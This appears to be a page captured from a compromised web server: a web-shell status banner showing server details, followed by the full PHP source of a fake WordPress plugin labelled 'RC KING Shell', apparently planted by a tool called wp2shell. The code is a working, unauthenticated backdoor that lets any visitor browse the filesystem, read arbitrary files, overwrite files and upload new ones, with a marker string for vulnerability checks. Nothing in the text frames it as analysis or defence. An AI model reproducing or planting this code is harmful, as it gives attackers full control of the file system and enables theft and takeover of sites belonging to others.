| Server IP : 64.225.102.56 / Your IP : 216.73.216.220 Web Server : Apache/2.4.68 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/3.0.2 System : Linux smtp.zejefoy.com 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64 User : auto ( 1002) PHP Version : 7.4.33 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/auto/web/cifisoa.com/public_html/wp-content/plugins/wp2shell_fda32eec/ |
Upload File : |
<?php
/*
Plugin Name: wp2shell_fda32eec
Description: RC KING Shell - File manager (uploaded by wp2shell)
Version: 1.0.0
*/
if (!defined('ABSPATH')) { define('ABSPATH', __DIR__ . '/'); }
@error_reporting(0);
echo "VULN_CHECK_I913V6";
$root = __DIR__;
function updir($ADir){
$ADir = rtrim($ADir, '/');
return substr($ADir, 0, strrpos($ADir, '/'));
}
$path = isset($_GET['file']) ? $_GET['file'] : $root;
if (isset($_GET['view']) && is_file($_GET['view'])) {
header("Content-type: text/plain");
readfile($_GET['view']);
exit;
}
if (isset($_POST['save_file']) && isset($_POST['content'])) {
file_put_contents($_POST['save_file'], $_POST['content']);
}
if (isset($_FILES['upload_file'])) {
$target = rtrim($path, '/') . '/' . basename($_FILES['upload_file']['name']);
move_uploaded_file($_FILES['upload_file']['tmp_name'], $target);
}
echo "<b>RC KING Shell - Current root:</b> $root <br>";
echo "<b>Current path:</b> $path <hr>";
echo '<a href="?file='.updir($path).'">..</a><br />';
foreach (glob(rtrim($path,'/').'/*') as $file) {
echo '<a href="?file='.$file.'">'.basename($file).'</a>';
if (is_file($file)) {
echo ' | <a href="?view='.$file.'" target="_blank">[Göster]</a> | <a href="?edit='.$file.'">[Düzenle]</a>';
}
echo "<br>";
}
if (isset($_GET['edit']) && is_file($_GET['edit'])) {
$editFile = $_GET['edit'];
$content = htmlspecialchars(file_get_contents($editFile));
echo "<h3>Dosya Düzenle: ".basename($editFile)."</h3><form method='POST'><textarea name='content' style='width:100%;height:300px;'>$content</textarea><input type='hidden' name='save_file' value='$editFile'><button type='submit'>Kaydet</button></form>";
}
echo '<hr><h3>Dosya Yükle</h3><form method="POST" enctype="multipart/form-data"><input type="file" name="upload_file"><button type="submit">Yükle</button></form>';